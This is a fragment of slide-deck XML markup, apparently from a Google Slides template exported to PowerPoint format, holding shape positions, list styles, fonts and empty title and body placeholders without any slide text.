            <a:off x="8052577"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9" name="Google Shape;209;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6984573"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0" name="Google Shape;210;p3"/>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1" name="Google Shape;211;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61607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2" name="Google Shape;212;p3"/>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3" name="Google Shape;213;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48922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4" name="Google Shape;214;p3"/>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5" name="Google Shape;215;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489179" y="4206693"/>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6" name="Google Shape;216;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="7236726"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7" name="Google Shape;217;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82632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8" name="Google Shape;218;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="76843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9" name="Google Shape;219;p3"/>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0" name="Google Shape;220;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50595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1" name="Google Shape;221;p3"/>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2" name="Google Shape;222;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482765"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3" name="Google Shape;223;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9459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4" name="Google Shape;224;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22630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5" name="Google Shape;225;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17809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6" name="Google Shape;226;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17065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7" name="Google Shape;227;p3"/>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8" name="Google Shape;228;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009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9" name="Google Shape;229;p3"/>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0" name="Google Shape;230;p3"/>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1" name="Google Shape;231;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32519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2" name="Google Shape;232;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251978"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3" name="Google Shape;233;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183974"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4" name="Google Shape;234;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="39491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5" name="Google Shape;235;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13601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6" name="Google Shape;236;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37218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7" name="Google Shape;237;p3"/>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8" name="Google Shape;238;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40288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9" name="Google Shape;239;p3"/>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0" name="Google Shape;240;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="2436125"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1" name="Google Shape;241;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34626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2" name="Google Shape;242;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="28837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3" name="Google Shape;243;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28590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4" name="Google Shape;244;p3"/>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5" name="Google Shape;245;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29818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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="975979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92" name="Google Shape;292;p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lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-387350">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2500"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="25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5" name="Google Shape;295;p5"/>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6" name="Google Shape;296;p5"/>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7" name="Google Shape;297;p5"/>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8" name="Google Shape;298;p5"/>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9" name="Google Shape;299;p5"/>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0" name="Google Shape;300;p5"/>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1" name="Google Shape;301;p5"/>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2" name="Google Shape;302;p5"/>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3" name="Google Shape;303;p5"/>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4" name="Google Shape;304;p5"/>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5" name="Google Shape;305;p5"/>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6" name="Google Shape;306;p5"/>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7" name="Google Shape;307;p5"/>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8" name="Google Shape;308;p5"/>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9" name="Google Shape;309;p5"/>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0" name="Google Shape;310;p5"/>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1" name="Google Shape;311;p5"/>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2" name="Google Shape;312;p5"/>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3" name="Google Shape;313;p5"/>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4" name="Google Shape;314;p5"/>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5" name="Google Shape;315;p5"/>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6" name="Google Shape;316;p5"/>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7" name="Google Shape;317;p5"/>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8" name="Google Shape;318;p5"/>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9" name="Google Shape;319;p5"/>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0" name="Google Shape;320;p5"/>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1" name="Google Shape;321;p5"/>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2" name="Google Shape;322;p5"/>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24" name="Google Shape;324;p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4733478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bwMode="auto">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avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>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239950" y="47617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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="4690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239950" y="46177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39950" y="4546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39950" y="44737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239950" y="4402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39950" y="43297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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="4258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239950" y="41858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239950" y="4114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239950" y="40418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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="39693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239950" y="38978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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="38254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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="37538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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="36814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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="36099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239950" y="35374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39950" y="34659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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="33934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239950" y="33219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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="32495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239950" y="31770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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="31055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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="3033100"/>
              <a:ext cx="7042900" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="281716"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239950" y="29615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239950" y="28891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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="28175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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="27451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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="26736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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="2601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239950" y="25296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239950" y="2457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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="23847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239950" y="2313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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="22407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239950" y="2169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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="20968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239950" y="2025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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="19528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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="18813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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="18088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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="17373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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="16648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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="15924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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="15209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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="14484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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="13769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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="13044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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="12329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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="11605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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="10889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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="10165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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="9450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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7210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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7137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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="70645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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="69921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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="69196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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6847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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6774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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6702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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="66289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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65565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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="64840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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6411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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="633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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6266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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6193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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6120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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60484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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5976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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5903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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5830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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5757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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5685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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="56129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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5540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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5468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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5394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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="53222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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5249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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5177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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="510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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5032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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4959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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4886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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="48141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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4741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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4669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4596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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4523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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4451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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="43785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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4306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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4233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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4160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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40878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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4015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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3942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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="38705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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3798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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3724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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3652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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3579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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3507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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3434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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3362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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3289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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3216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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="31442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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3071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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2999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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2925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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="28535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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2781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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="27086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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2636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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2563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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2490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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2417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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2345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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2273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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2200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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2128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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2054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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1982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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19098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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1837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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1764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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1692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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="161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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1546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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14742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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1401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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1256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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1183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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1111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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10387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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9662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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8938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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="820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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="675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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6031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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5306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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4582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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="38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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312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
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="225025"/>
            <a:ext cx="67917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1pPr>
            <a:lvl2pPr lvl="1">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2pPr>
            <a:lvl3pPr lvl="2">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3pPr>
            <a:lvl4pPr lvl="3">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4pPr>
            <a:lvl5pPr lvl="4">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5pPr>
            <a:lvl6pPr lvl="5">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6pPr>
            <a:lvl7pPr lvl="6">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7pPr>
            <a:lvl8pPr lvl="7">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8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3C78D8"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Sniglet"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1314900"/>
            <a:ext cx="6791700" cy="3610800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-393700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-355600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="✗"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-355600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="■"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" lvl="5"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6pPr>
            <a:lvl7pPr marL="3200400" lvl="6"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7pPr>
            <a:lvl8pPr marL="3657600" lvl="7"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8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
